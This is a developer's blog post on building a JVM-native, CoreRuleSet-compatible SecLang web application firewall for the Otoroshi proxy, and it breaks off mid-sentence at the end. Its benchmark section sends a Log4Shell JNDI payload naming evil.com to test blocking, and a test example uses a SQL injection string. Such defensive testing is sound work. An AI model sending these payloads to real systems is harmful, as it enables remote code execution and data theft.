Building a JVM-Native WAF: A Journey from WASM to Pure Scala

How I spent my Christmas holidays building a SecLang-compatible Web Application Firewall (almost) from scratch


For the past two years, Otoroshi has had a Web Application Firewall powered by Coraza, the excellent Go implementation of ModSecurity. To achieve that, we compiled Coraza to WebAssembly (WASM) and ran it inside Otoroshi using wasm4s, our orchestrator for WASM virtual machines. It worked really well, especially with only a handful of WAF configurations. But as we scaled the number of WAF configurations and concurrent WASM VM instances into the hundreds, cracks started to show. Because the Coraza WASM integration is stateful, one configuration (a list of SecLang statements, typically different for each tenant) is tied to one WASM VM: we cannot initialize a generic WASM VM and dynamically inject a different configuration for each evaluation. So, with hundreds of possible configurations, memory usage exploded, latency increased, and configurations became unmanageable.

This is the story of how I built a complete SecLang engine in Scala during my Christmas vacation (well you know, after the kids went to bed!), why I did it, and all the technical challenges along the way.

The Problem with WASM-Based WAFs

Before diving into the solution, let me explain why we needed one in the first place.

Our WASM-based Coraza integration had several pain points:

  1. Single-threaded execution: A WASM VM instance, as we ran it, executes on a single thread. To handle concurrent requests, we had to spin up multiple WASM virtual machines per WAF configuration.

  2. Memory footprint: Each WASM instance loads a ~20MB binary. Multiply that by the number of instances needed for multi-tenancy / concurrency, and memory usage adds up fast.

  3. Serialization overhead: Every request had to be serialized from JVM objects to WASM-compatible structures, processed, then deserialized back. At scale, this serialization dance became a measurable bottleneck.

  4. Configuration duplication: Each WASM instance needed its own copy of the rules. No sharing, no caching, no composition.

In short: WASM solved portability, but exposed scalability limits in our very specific multi-tenant configuration model at Cloud APIM. What we needed was a native JVM implementation: thread-safe, memory-efficient, and designed for multi-tenant environments where configurations can be shared and composed. At that scale, the limiting factor was not WebAssembly itself, but the way execution environments and configurations were coupled.

Understanding the Landscape: ModSecurity, SecLang, and CoreRuleSet

Before I explain how I built the solution, let's make sure we're all on the same page about the ecosystem.

ModSecurity: The Grandfather of WAFs

ModSecurity is the most widely deployed open-source Web Application Firewall. Originally created for Apache in 2002, it later became a standalone library that can be embedded in any web server or proxy.

ModSecurity itself doesn't block attacks—it provides the engine. You feed it rules, and it evaluates incoming requests against those rules.

SecLang: The Rule Language

SecLang (or "SecRule Language") is the domain-specific language used to write ModSecurity rules. It's become a de facto standard—virtually every serious WAF implementation understands SecLang rules.

Here's what a typical SecLang rule looks like:

SecRule REQUEST_HEADERS:User-Agent "@pm firefox chrome safari" \
    "id:1001,\
    phase:1,\
    pass,\
    t:none,t:lowercase,\
    msg:'Browser detected',\
    tag:'browser-detection'"

Let's break this down:

  • SecRule: The directive that defines a rule

  • REQUEST_HEADERS:User-Agent: The variable to inspect (HTTP User-Agent header)

  • @pm firefox chrome safari: The operator (@pm = phrase match, checks if any of the words appear)

  • id:1001: Unique rule identifier

  • phase:1: When to execute (phase 1 = after headers are received)

  • pass: Action to take on match (continue processing)

  • t:none,t:lowercase: Transformations to apply before matching

  • msg:'...': Log message when rule matches

  • tag:'...': Categorization tag
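To make the breakdown concrete, here is a minimal sketch of how this one rule could be evaluated by hand. It is not the engine's code: `PmRuleSketch`, `transform`, `pm` and `rule1001Matches` are hypothetical names, transformations are modelled as plain `String => String` functions, and `@pm` is approximated with a case-insensitive substring check.

```scala
object PmRuleSketch {
  // Assumption: a transformation is just a function from String to String.
  type Transformation = String => String

  val lowercase: Transformation = _.toLowerCase

  // t:none resets the pipeline, so for rule 1001 only t:lowercase remains.
  // Transformations are applied left to right.
  def transform(value: String, pipeline: List[Transformation]): String =
    pipeline.foldLeft(value)((acc, t) => t(acc))

  // @pm: true if any of the phrases occurs in the value (case-insensitive).
  def pm(phrases: List[String], value: String): Boolean = {
    val lowered = value.toLowerCase
    phrases.exists(p => lowered.contains(p.toLowerCase))
  }

  // Hypothetical helper: would rule 1001 match these request headers?
  def rule1001Matches(headers: Map[String, String]): Boolean =
    headers
      .collectFirst { case (name, value) if name.equalsIgnoreCase("User-Agent") => value }
      .exists(ua => pm(List("firefox", "chrome", "safari"), transform(ua, List(lowercase))))
}
```

Since the rule's action is `pass`, a match only logs the message and tag; processing continues either way.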

SecLang supports five execution phases:

Phase | Name             | When
1     | Request Headers  | After request headers are received
2     | Request Body     | After request body is received
3     | Response Headers | After response headers are received
4     | Response Body    | After response body is received
5     | Logging          | Before logging

OWASP CoreRuleSet: The Industry Standard

The OWASP CoreRuleSet (CRS) is a comprehensive set of SecLang rules that protect against common web attacks:

  • SQL Injection

  • Cross-Site Scripting (XSS)

  • Local File Inclusion (LFI)

  • Remote Code Execution

  • Protocol violations

  • And dozens more categories

CRS is battle-tested, regularly updated, and used by major CDNs and WAF vendors worldwide. Any serious SecLang implementation needs to be CRS-compatible.

The current version (CRS 4.x) contains over 600 rules organized into categories like:

REQUEST-911-METHOD-ENFORCEMENT.conf
REQUEST-913-SCANNER-DETECTION.conf
REQUEST-920-PROTOCOL-ENFORCEMENT.conf
REQUEST-930-APPLICATION-ATTACK-LFI.conf
REQUEST-932-APPLICATION-ATTACK-RCE.conf
REQUEST-933-APPLICATION-ATTACK-PHP.conf
REQUEST-941-APPLICATION-ATTACK-XSS.conf
REQUEST-942-APPLICATION-ATTACK-SQLI.conf
REQUEST-949-BLOCKING-EVALUATION.conf
...

To sum it up: ModSecurity is the engine, SecLang is the language, and CRS is the knowledge base.

The Christmas Project Begins

It was late December, and I was looking for a fun side project. I had been pondering the WAF problem for months, maybe years, but always convinced myself it was too complex. The SecLang parser alone seemed like a mountain. I'd already tried several approaches using Scala parser combinators, fastparse, and even regular expressions, but none of them worked 100% of the time.

Then I stumbled upon seclang_parser—an ANTLR grammar for SecLang, maintained by the CoreRuleSet team. Suddenly, the mountain looked more like a hill.

Here's the high-level architecture I ended up building:

The key insight: compilation happens once, evaluation happens per-request. Let's walk through each component.

Part 1: The Parser

ANTLR to the Rescue

ANTLR (Another Tool for Language Recognition) is a parser generator that reads grammar files and produces parsers in various target languages. Given a .g4 grammar file, ANTLR generates a lexer, parser, and visitor/listener classes.

I took the seclang_parser grammar and generated Java code:

antlr4 -visitor -package com.cloud.apim.seclang.antlr SecLangLexer.g4 SecLangParser.g4

This gave me a solid foundation, but ANTLR only handles the syntax—I still needed to build the AST (Abstract Syntax Tree).

Building the AST Visitor

ANTLR uses the visitor pattern. You extend the generated SecLangParserBaseVisitor class and implement methods for each grammar rule you care about.

import scala.jdk.CollectionConverters._ // Scala 2.13+; provides .asScala on Java collections

class AstBuilderVisitor extends SecLangParserBaseVisitor[Any] {

  // Entry point: visit every parsed statement and keep the ones that produced an AST node
  override def visitConfiguration(ctx: ConfigurationContext): Configuration = {
    val statements = ctx.statement().asScala.flatMap { stmtCtx =>
      Option(visitStmt(stmtCtx)).collect { case s: Statement => s }
    }.toList
    Configuration(statements)
  }

  // A SecRule is variables + operator + optional actions; ctx.getText keeps the rule's source text
  override def visitSecRule(ctx: SecRuleContext): SecRule = {
    val variables = visitVariables(ctx.variables())
    val operator = visitOperator(ctx.operator())
    val actions = Option(ctx.actions()).map(visitActions)
    SecRule(None, variables, operator, actions, ctx.getText)
  }

  // ... hundreds more visitor methods
}

The parser entry point is simple:

import org.antlr.v4.runtime.{CharStreams, CommonTokenStream}

object AntlrParser {
  def parse(input: String): Either[String, Configuration] = {
    val errorListener = new CollectingErrorListener()

    val lexer = new SecLangLexer(CharStreams.fromString(input))
    // Collect lexer errors too, instead of letting ANTLR print them to the console
    lexer.removeErrorListeners()
    lexer.addErrorListener(errorListener)

    val tokens = new CommonTokenStream(lexer)
    val parser = new SecLangParser(tokens)
    parser.removeErrorListeners()
    parser.addErrorListener(errorListener)

    val tree = parser.configuration()

    if (errorListener.hasErrors) {
      Left(errorListener.getErrors.mkString("\n"))
    } else {
      val visitor = new AstBuilderVisitor()
      Right(visitor.visitConfiguration(tree))
    }
  }
}

This was the foundation. With my friend Claude's help, I was able to flesh out all the visitor methods and handle the quirks of SecLang syntax. The parser visitor alone is about 400 lines of Scala (backed by 11k lines of Java generated by ANTLR).

Part 2: The Compiler

Once I had an AST, I needed to transform it into something executable. Over time, it became clear that a SecLang engine is less about request filtering and more about interpreting a security-specific programming language under strict performance constraints. The compiler's job is to:

  1. Resolve rule chains: SecLang allows chaining rules with the chain action—if the first rule matches, check the second, and so on.

  2. Organize by phase: Group rules by their execution phase for efficient processing.

  3. Handle rule removals: Process SecRuleRemoveById, SecRuleRemoveByTag, etc.

  4. Index markers: For skipAfter actions, pre-compute marker positions.

  5. Pre-compile regexes: Compile regular expressions once, not on every evaluation.

Here's a simplified view of the chain resolution logic:

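import scala.collection.mutable.ListBuffer

def compileChains(rules: List[SecRule]): List[RuleChain] = {
  val chains = ListBuffer[RuleChain]()
  val current = ListBuffer[SecRule]()

  for (rule <- rules) {
    current += rule
    if (!rule.isChain) {
      // Chain complete, emit it
      chains += RuleChain(current.toList)
      current.clear()
    }
  }

  // A trailing rule marked `chain` with no follow-up stays in `current`
  // and is dropped here; a real compiler would likely report it as an error.
  chains.toList
}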

The compiler outputs a CompiledProgram:

case class CompiledProgram(
  chains: Map[Int, List[RuleChain]],   // phase -> chains
  markers: Map[String, Int],           // marker name -> index
  mode: EngineMode                     // On, Off, or DetectionOnly
)
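As an illustration of steps 2 and 4 (organizing by phase and indexing markers), here is a minimal sketch under simplifying assumptions. `Item`, `Chain`, `Marker` and `Program` are hypothetical stand-ins for the real AST and `CompiledProgram` types, and the marker index is simply the position in the flat statement list, which may differ from what the engine actually stores.

```scala
object CompileSketch {
  // Simplified stand-ins for the real AST types (assumptions, not the library's model).
  sealed trait Item
  final case class Chain(ruleIds: List[Int], phase: Int) extends Item
  final case class Marker(name: String) extends Item

  final case class Program(chains: Map[Int, List[Chain]], markers: Map[String, Int])

  def compile(items: List[Item]): Program = {
    // Group chains by phase; List.groupBy keeps the original order inside each group.
    val chains = items.collect { case c: Chain => c }.groupBy(_.phase)
    // Record each marker's position once, so a skipAfter becomes a map lookup.
    val markers = items.zipWithIndex.collect { case (Marker(name), idx) => name -> idx }.toMap
    Program(chains, markers)
  }
}
```

Doing this once at compile time means the per-request loop never has to scan the full rule list to find a phase or a marker.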

Part 3: The Runtime Engine

This is where the real work happens. The engine evaluates a CompiledProgram against a RequestContext and returns a disposition (continue or block).

The Core Loop

Here's a simplified view of the core loop logic:

def evaluate(ctx: RequestContext, phases: List[Int]): EngineResult = {
  var state = RuntimeState.initial(program.mode)

  for (phase <- phases if state.shouldContinue) {
    for (chain <- program.chains.getOrElse(phase, Nil)) {
      val result = evaluateChain(chain, ctx, state)
      state = result.state

      result.disposition match {
        case Disposition.Block(status, msg, ruleId) =>
          // Early exit
          return EngineResult(
            Disposition.Block(status, msg, ruleId), 
            state
          )
        case Disposition.Continue =>
          // Keep going
      }
    }
  }

  EngineResult(Disposition.Continue, state)
}
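The loop above delegates to evaluateChain, which is not shown. Here is a minimal sketch of the idea, assuming a chain only triggers when every rule in it matches and that the disruptive action belongs to the first rule of the chain. All types here are hypothetical and much simpler than the engine's (rules are reduced to a predicate over the URI).

```scala
object ChainSketch {
  sealed trait Disposition
  case object Continue extends Disposition
  final case class Block(status: Int, ruleId: Int) extends Disposition

  // Hypothetical, simplified rule: an id plus a predicate over the request URI.
  final case class Rule(id: Int, matches: String => Boolean)

  // blockStatus is the status of the chain starter's disruptive action, if any.
  final case class RuleChain(rules: List[Rule], blockStatus: Option[Int])

  def evaluateChain(chain: RuleChain, uri: String): Disposition = {
    // forall stops at the first rule that does not match (short-circuit).
    val allMatch = chain.rules.nonEmpty && chain.rules.forall(_.matches(uri))
    (allMatch, chain.blockStatus) match {
      case (true, Some(status)) => Block(status, chain.rules.head.id)
      case _                    => Continue
    }
  }
}
```

A single non-chained rule is just a chain of length one, which is why the compiler can treat everything as a RuleChain.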

Variables, Transformations, Operators, Actions

The engine implements four key components, all following the same pattern—Scala pattern matching over the AST:

  • Variables (30+): Extract data from the request (REQUEST_URI, REQUEST_HEADERS, ARGS, COOKIES, etc.). Support collection access with keys and regex selectors like REQUEST_HEADERS:/^X-Custom-/.

  • Transformations (25+): Normalize values before matching (lowercase, urlDecode, base64Decode, htmlEntityDecode, removeWhitespace, etc.). Can be chained: t:lowercase,t:urlDecode.

  • Operators (15+): Perform the actual matching (@rx for regex, @pm for phrase match, @contains, @beginsWith, @ipMatch, @detectSQLi, @detectXSS, etc.).

  • Actions: Execute on match (block, pass, deny, setvar for TX variables, skip, skipAfter for flow control, etc.).
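To illustrate the collection access mentioned for variables, here is a minimal sketch of selecting header values by exact key or by regex selector. The `Selector` model and `select` function are hypothetical names for illustration, not the engine's API.

```scala
object VariableSketch {
  // Hypothetical selector model for a collection variable such as REQUEST_HEADERS.
  sealed trait Selector
  case object All extends Selector                             // REQUEST_HEADERS
  final case class Key(name: String) extends Selector          // REQUEST_HEADERS:User-Agent
  final case class KeyRegex(pattern: String) extends Selector  // REQUEST_HEADERS:/^X-Custom-/

  def select(headers: Map[String, List[String]], selector: Selector): List[String] =
    selector match {
      case All =>
        headers.values.flatten.toList
      case Key(name) =>
        // Header names are compared case-insensitively.
        headers.toList.collect { case (k, vs) if k.equalsIgnoreCase(name) => vs }.flatten
      case KeyRegex(pattern) =>
        val re = pattern.r
        headers.toList.collect { case (k, vs) if re.findFirstIn(k).isDefined => vs }.flatten
    }
}
```

Each selected value then goes through the transformation pipeline and the operator independently.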

Here's a taste of how operators are implemented:

def matchOperator(op: Operator, value: String): Boolean = op match {
  case Operator.Rx(pattern) => RegexPool.regex(pattern).findFirstIn(value).isDefined
  case Operator.Pm(phrases) => phrases.exists(p => value.toLowerCase.contains(p.toLowerCase))
  case Operator.Contains(s) => value.contains(s)
  case Operator.IpMatch(ranges) => ranges.exists(_.contains(InetAddress.getByName(value)))
  // ... etc
}
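One detail worth noting for the @ipMatch case: InetAddress.getByName resolves host names, so a value that is not an IP literal can trigger a DNS lookup. Below is a minimal sketch of an alternative that parses IPv4 literals only and checks CIDR membership with a bit mask. `CidrSketch` and its functions are hypothetical, IPv6 is left out, and this is not how the engine's range type is implemented.

```scala
import scala.util.Try

object CidrSketch {
  // Parse a dotted-quad IPv4 literal without any DNS resolution; None if malformed.
  def ipv4ToLong(ip: String): Option[Long] = {
    val octets = ip.split('.').toList
      .flatMap(p => Try(p.toInt).toOption.filter(o => o >= 0 && o <= 255))
    if (octets.length == 4 && ip.count(_ == '.') == 3)
      Some(octets.foldLeft(0L)((acc, o) => (acc << 8) | o))
    else None
  }

  // True if `ip` falls inside `cidr` (for example "10.0.0.0/8"); a bare address means /32.
  def contains(cidr: String, ip: String): Boolean = {
    val (base, bits) = cidr.split('/') match {
      case Array(b, n) => (b, Try(n.toInt).getOrElse(-1))
      case Array(b)    => (b, 32)
      case _           => ("", -1)
    }
    if (bits < 0 || bits > 32) false
    else {
      // Keep the top `bits` bits of a 32-bit address.
      val mask = (0xFFFFFFFFL << (32 - bits)) & 0xFFFFFFFFL
      (for (b <- ipv4ToLong(base); a <- ipv4ToLong(ip)) yield (a & mask) == (b & mask))
        .getOrElse(false)
    }
  }
}
```

Malformed input simply fails to match instead of throwing, which is usually what you want on the request path.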

Part 4: The libinjection Challenge

As I was implementing operators, I hit a wall: SecLang includes @detectSQLi and @detectXSS operators that use libinjection, a C library for detecting SQL injection and XSS attacks. There was no Java/Scala port. So I had two options:

  • give up

  • or port a 4,000-line C security library to Java

Guess which one I chose.

libinjection uses a clever technique: instead of regex patterns, it tokenizes input and generates a "fingerprint" that's matched against known attack patterns. For example, the SQL input 1' OR '1'='1 gets tokenized and folded into [s, &, s] (string, boolean operator, string), then matched against 9,000+ known SQLi fingerprints. XSS detection works similarly using HTML5 tokenization to detect dangerous tags, attributes, and URL schemes.

The port took considerable effort—the original C code is 4,000+ lines with lots of pointer arithmetic. My friend Claude's help was invaluable here, helping me translate idioms and catch edge cases. The result is libinjection-jvm, a zero-dependency Java library with full test suite compatibility.

Part 5: The CoreRuleSet Test Suite

Building the engine was one thing. Proving it worked was another.

The CoreRuleSet project includes a comprehensive test suite with over 4,000 tests in YAML format:

- test_id: 1
  desc: "Test SQL injection detection"
  stages:
    - input:
        method: "GET"
        uri: "/test?id=1' OR '1'='1"
      output:
        log:
          expect_ids: [942100]

I wrote a test runner that:

  1. Parses the YAML test definitions

  2. Constructs RequestContext objects from the test input

  3. Runs the engine against the CRS rules

  4. Verifies the expected outcome (blocked or allowed)
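The steps above can be sketched roughly as follows. This is a simplified illustration, not my actual runner: YAML parsing is left out, `Stage` is a hypothetical already-parsed form of a test stage, and `evaluate` stands in for the engine by returning the ids of the rules that matched.

```scala
object CrsTestRunnerSketch {
  // Hypothetical, already-parsed form of one YAML stage (YAML parsing omitted).
  final case class Stage(testId: Int, method: String, uri: String, expectIds: Set[Int])

  sealed trait Outcome
  case object Passed extends Outcome
  final case class Failed(testId: Int, missing: Set[Int]) extends Outcome

  // `evaluate` takes (method, uri) and returns the ids of the rules that matched.
  def run(stages: List[Stage], evaluate: (String, String) => Set[Int]): List[Outcome] =
    stages.map { s =>
      val missing = s.expectIds -- evaluate(s.method, s.uri)
      if (missing.isEmpty) Passed else Failed(s.testId, missing)
    }
}
```

Reporting the missing rule ids, rather than a bare pass/fail, is what makes a failing test actionable when hundreds of them fail at once.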

The CRS test suite turned out to be as much a specification of behavior as a validation tool.

The first run gave a 40% pass rate. After a few hours of simple fixes, it reached 60%.

Then began the debugging marathon. Some failures were engine bugs. Others were test runner bugs. A few were my misunderstanding of SecLang semantics.

Test: 942100-1
Expected: BLOCKED
Got: ALLOWED
Rule: SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|... "@rx (?i)..." ...
Issue: Regex flag handling in negative lookahead

One by one, I fixed issues:

  • Regex flags not properly propagated

  • TX variable increment semantics

  • Chain evaluation short-circuit logic

  • Transformation ordering

  • Case sensitivity in header matching

  • Phase 5 logging-only rules incorrectly blocking

This part was an emotional roller coaster—some patches would fix only a single test while others would fix around 200 at once. But after one week of work: 100% pass rate across 4,138 tests.

{
  "global_stats": {
    "passing_percentage": 100,
    "total_tests": 4174,
    "success_tests": 4174,
    "failure_tests": 0
  },
  "time_stats": {
    "total_time_ms": 25945,
    "avg_time_ms": 6,
    "min_time_ms": 1,
    "max_time_ms": 4242
  }
}

The Apache Problem

Here's something I didn't anticipate: the official CRS test suite was designed to test ModSecurity + CRS running inside Apache, in a Docker container. The test harness sends real HTTP requests to the container and checks the responses.

The problem? Some tests weren't actually testing WAF behavior—they were testing Apache's behavior. For example, Apache rejects certain malformed requests (invalid characters in URIs, malformed HTTP lines) before they even reach ModSecurity. The test expected a block, but the block came from Apache, not from CRS rules.

When running the same tests against a pure SecLang engine with no Apache in front, these tests would fail—not because my engine was wrong, but because the test assumed Apache's preprocessing.

Since my test runner evaluates rules directly (no reverse proxy involved), I had to identify these cases and change the acceptance criteria. Instead of checking that the server responds with a 400 status (which would be Apache's doing), I modified the tests to verify that a specific CRS rule was matched. Same malicious input, but now testing the actual WAF behavior. This work could potentially benefit the upstream CRS project for anyone building alternative SecLang implementations.

Part 6: The Factory Pattern for Multi-Tenancy

At Cloud APIM, we run multi-tenant infrastructure. Multiple customers can share Otoroshi instances (or use their own), each with their own WAF configurations. We needed:

  1. Shared base rules: CRS loaded once, shared across all tenants

  2. Per-tenant customization: Each tenant can add/remove rules

  3. Efficient caching: Compiled programs cached and reused

In practice, multi-tenancy tends to turn configuration into a first-class scalability concern, on par with CPU and memory.

The solution: a factory pattern with presets.

// Define reusable presets
val presets = Map(
  "crs" -> SecLangPreset.fromResources("crs",
    "/coreruleset/crs-setup.conf.example",
    "/coreruleset/rules/*.conf"
  )
)

// Create factory
val factory = SecLang.factory(presets)

// Tenant-specific configuration
val tenantRules = List(
  "@import_preset crs",
  """SecRuleRemoveById 942100""",  // Disable specific rule
  """SecRule REQUEST_URI "@contains /health" "id:10001,phase:1,allow,nolog" """,
  "SecRuleEngine On"
)

// Get compiled engine (cached)
val engine = factory.engine(tenantRules)

The factory:

  • Compiles each unique rule configuration once

  • Caches CompiledProgram instances with configurable TTL

  • Supports rule composition through preset imports

  • Thread-safe for concurrent access
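To give an idea of the caching behavior, here is a minimal sketch of a compile-once cache with a TTL. It is an illustration only: `CachingFactory`, `Compiled` and the injectable `now` clock are hypothetical, and the real factory also handles preset imports, which are left out here.

```scala
import scala.collection.concurrent.TrieMap

object FactorySketch {
  // Stand-in for a compiled program; the real type is much richer (assumption).
  final case class Compiled(rules: List[String])

  final class CachingFactory(compile: List[String] => Compiled,
                             ttlMillis: Long,
                             now: () => Long = () => System.currentTimeMillis()) {
    // Key: the rule list itself. Value: the compiled program and its creation time.
    private val cache = TrieMap.empty[List[String], (Compiled, Long)]

    def engine(rules: List[String]): Compiled = {
      val t = now()
      cache.get(rules) match {
        case Some((program, createdAt)) if t - createdAt < ttlMillis => program
        case _ =>
          // Two threads may compile the same config concurrently; the last write wins.
          val program = compile(rules)
          cache.put(rules, (program, t))
          program
      }
    }
  }
}
```

Because the key is the rule list, two tenants with identical rules share one compiled program without any extra bookkeeping.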

Part 7: Otoroshi Integration

The final piece: integrating the engine into Otoroshi as an extension. Otoroshi is an open-source HTTP reverse proxy written in Scala that I created several years ago. One of the main perks of Otoroshi is that it's a very extensible project where you can easily write and use your own plugins and extensions.

The WAF Configuration Entity

With this extension, a new entity becomes available to configure WAF behavior (not an actual WAF instance per se, but you know what I mean). One important aspect here is the ability to toggle body inspection. By design, Otoroshi doesn't load request or response bodies into memory—it streams them. So there's a tradeoff: enabling body inspection makes Otoroshi a bit slower and heavier on RAM, but allows the WAF to detect attacks hidden in payloads.

case class CloudApimWafConfig(
  id: String,
  name: String,
  enabled: Boolean = true,
  block: Boolean = true,              // Block vs. monitor-only
  inspectInputBody: Boolean = true,
  inspectOutputBody: Boolean = true,
  inputBodyLimit: Option[Long] = None,
  outputBodyLimit: Option[Long] = None,
  outputBodyMimetypes: Seq[String] = Seq.empty,
  rules: Seq[String] = Seq.empty
)

Configuration example:

{
  "id": "waf-config_production",
  "name": "Production WAF",
  "enabled": true,
  "block": true,
  "inspect_input_body": true,
  "inspect_output_body": true,
  "input_body_limit": 1048576,
  "output_body_limit": 1048576,
  "output_body_mimetypes": ["text/html", "application/json"],
  "rules": [
    "@import_preset crs",
    "SecRuleRemoveById 942100",
    "SecRuleEngine On"
  ]
}

The Plugin

The plugin hooks into Otoroshi's request/response pipeline:

class CloudApimWaf extends NgRequestTransformer {

  override def transformRequest(ctx: NgTransformerRequestContext): Future[Either[Result, NgPluginHttpRequest]] = {
    val wafConfig = getConfig(ctx)
    val engine = ext.factory.engine(wafConfig.rules.toList)

    val requestCtx = buildRequestContext(ctx.request, ctx.body)
    val result = engine.evaluate(requestCtx, List(1, 2, 5))

    result.disposition match {
      case Disposition.Continue =>
        ctx.otoroshiRequest.rightf

      case Disposition.Block(status, msg, ruleId) if wafConfig.block =>
        emitEvent(result, ctx)
        Results.Status(status)(buildErrorResponse(msg, ruleId)).leftf

      case Disposition.Block(_, _, _) =>
        // Monitor mode - log but don't block
        emitEvent(result, ctx)
        ctx.otoroshiRequest.rightf
    }
  }

  override def transformResponse(ctx: NgTransformerResponseContext): Future[Either[Result, NgPluginHttpResponse]] = {
    // Similar logic for response phases (3, 4, 5)
  }
}

Performance Characteristics

After all optimizations, here's how the native implementation compares to our previous WASM-based solution:

Metric                 | WASM (Coraza)               | Native (seclang-engine)
Memory per config      | ~20MB/instance              | ~20KB/instance + ~2MB (shared CRS)
Concurrency model      | Multiple VMs needed         | One engine per request, single instance config., thread-safe
Rule sharing           | None (duplicated per VM)    | Full sharing via presets
Serialization overhead | JVM ↔ WASM on every request | Zero (native objects)
Startup time           | ~1500ms per VM              | One shot ~800ms to parse/compile CRS + ~10ms per uncached config.

And here are the raw performance numbers:

Metric                                       | Value
CRS evaluation on a legit request/response   | around 8ms
CRS evaluation on a suspicious request       | around 3ms for a Log4Shell attack
Regex compilation                            | Cached, zero-cost reuse

Compared to our WASM-based setup, the native engine:

  • uses ~1000x less memory per configuration,

  • removes serialization overhead,

  • scales naturally with JVM threads,

  • enables true multi-tenancy.

Here is a typical test running on my early 2024 MacBook Pro (M3 Pro), using oha with a legit request at 500 calls/sec over 1 minute:

$ oha -q 500 -c 200 -z 1m http://cawaf.oto.tools:9999 -H 'apk: foo' 

Summary:
  Success rate:    100.00%
  Total:    60004.7775 ms
  Slowest:    26.1541 ms
  Fastest:    2.2883 ms
  Average:    2.9967 ms
  Requests/sec:    500.0102

  Total data:    175.78 KiB
  Size/request:    6 B
  Size/sec:    2.93 KiB

Response time histogram:
   2.288 ms [1]     |
   4.675 ms [28740] |■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
   7.061 ms [961]   |■
   9.448 ms [221]   |
  11.835 ms [41]    |
  14.221 ms [17]    |
  16.608 ms [9]     |
  18.994 ms [2]     |
  21.381 ms [3]     |
  23.768 ms [3]     |
  26.154 ms [1]     |

Response time distribution:
  10.00% in 2.4673 ms
  25.00% in 2.5795 ms
  50.00% in 2.7420 ms
  75.00% in 3.0413 ms
  90.00% in 3.6479 ms
  95.00% in 4.4046 ms
  99.00% in 7.0370 ms
  99.90% in 12.2985 ms
  99.99% in 23.6878 ms


Details (average, fastest, slowest):
  DNS+dialup:    0.2206 ms, 0.1046 ms, 1.5284 ms
  DNS-lookup:    0.0247 ms, 0.0045 ms, 0.4549 ms

Status code distribution:
  [200] 29999 responses

Now the same test with a Log4Shell attack request:

$ oha -q 500 -c 200 -z 1m http://cawaf.oto.tools:9999 -H 'apk: ${jndi:ldap://evil.com/a}'

Summary:
  Success rate: 100.00%
  Total:  60003.4310 ms
  Slowest:  43.2109 ms
  Fastest:  1.9636 ms
  Average:  9.6649 ms
  Requests/sec: 499.9881

  Total data: 615.21 KiB
  Size/request: 21 B
  Size/sec: 10.25 KiB

Response time histogram:
    1.964 ms [1]     |
    4.508 ms [28517] |■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
    8.213 ms [1303]  |■
   13.338 ms [37]    |
   17.463 ms [73]    |
   21.587 ms [41]    |
   26.712 ms [25]    |
   30.837 ms [0]     |
   34.961 ms [0]     |
   39.086 ms [0]     |
   43.211 ms [2]     |

Response time distribution:
  10.00% in 2.2964 ms
  25.00% in 2.3817 ms
  50.00% in 2.5813 ms
  75.00% in 4.0106 ms
  90.00% in 3.5270 ms
  95.00% in 4.7680 ms
  99.00% in 6.6709 ms
  99.90% in 21.6669 ms
  99.99% in 25.4090 ms


Details (average, fastest, slowest):
  DNS+dialup: 0.9616 ms, 0.0578 ms, 4.4482 ms
  DNS-lookup: 0.0190 ms, 0.0028 ms, 1.4588 ms

Status code distribution:
  [400] 29999 responses

Key optimizations:

  1. RegexPool: Pre-compiled patterns cached by string key

  2. Early exit: Stop processing on first block disposition

  3. Phase-organized rules: Only load rules relevant to current phase

  4. Immutable programs: Compiled once, shared safely across threads

  5. TrieMap for TX variables: Thread-safe without locking
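As an illustration of the first optimization, here is a minimal sketch of a regex pool backed by a TrieMap. `RegexPoolSketch` is a hypothetical stand-in; the engine's RegexPool may differ, for example in how it bounds the cache.

```scala
import scala.collection.concurrent.TrieMap
import scala.util.matching.Regex

object RegexPoolSketch {
  private val cache = TrieMap.empty[String, Regex]

  // Racing threads may each compile a new pattern once, but only one instance
  // is stored; after that, every caller reuses the same immutable Regex.
  def regex(pattern: String): Regex = cache.getOrElseUpdate(pattern, pattern.r)

  def size: Int = cache.size
}
```

The pool is unbounded in this sketch, which is acceptable when patterns only come from rule files and not from request data.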

What's Not Implemented (Yet)

For transparency: not every SecLang feature made the cut. The missing pieces fall into three categories:

  1. Legacy cruft: Parity bit transformations (parityEven7bit, etc.) from the modem era. No modern use case.

  2. External dependencies: @geoLookup (needs MaxMind DB), @rbl (DNS lookups), SESSION variables (needs session store). These add latency and complexity—better handled by dedicated infrastructure components. Otoroshi has its own GeoIP plugin anyway.

  3. Domain-specific validation: @verifyCC, @verifyCPF, @verifySSN for credit cards and tax IDs. Not used by CRS, rarely needed in API security.

The 100% pass rate on CRS's 4,138 tests shows that everything CRS relies on is implemented. And if you do need something custom, the SecLangIntegration trait lets you hook in your own implementations without forking the engine.

Getting Started with seclang-engine

Want to try it yourself? Here's a minimal example showing how to use the library in your Scala project.

First, add the dependency to your build.sbt:

libraryDependencies += "com.cloud-apim" %% "seclang-engine" % "1.5.0"

Then, here's a complete working example:

import com.cloud.apim.seclang.model._
import com.cloud.apim.seclang.scaladsl.SecLang

object WafExample extends App {

  // 1. Define your SecLang rules
  val rules = """
    |SecRule REQUEST_HEADERS:User-Agent "@pm firefox" \
    |    "id:1001,\
    |    phase:1,\
    |    block,\
    |    t:none,t:lowercase,\
    |    msg:'Firefox browser blocked',\
    |    status:403,\
    |    severity:'CRITICAL'"
    |
    |SecRule REQUEST_URI "@contains /admin" \
    |    "id:1002,\
    |    phase:1,\
    |    block,\
    |    t:none,t:lowercase,\
    |    msg:'Admin access denied',\
    |    status:403"
    |
    |SecRuleEngine On
    |""".stripMargin

  // 2. Parse the rules into an AST
  val configuration = SecLang.parse(rules) match {
    case Left(error) => sys.error(s"Parse error: $error")
    case Right(config) => config
  }

  // 3. Compile the AST into an executable program
  val program = SecLang.compile(configuration)

  // 4. Create the engine
  val engine = SecLang.engine(program)

  // 5. Build a request context to evaluate
  val request = RequestContext(
    method = "GET",
    uri = "/api/users",
    headers = Headers(Map(
      "User-Agent" -> List("Mozilla/5.0 Chrome/120.0"),
      "Host" -> List("example.com")
    )),
    query = Map("page" -> List("1"))
  )

  // 6. Evaluate the request against phases 1 and 2
  val result = engine.evaluate(request, phases = List(1, 2))

  // 7. Check the result
  result.disposition match {
    case Disposition.Continue =>
      println("Request allowed")
    case Disposition.Block(status, msg, ruleId) =>
      println(s"Request blocked! Status: $status, Rule: $ruleId, Message: $msg")
  }
}

This example:

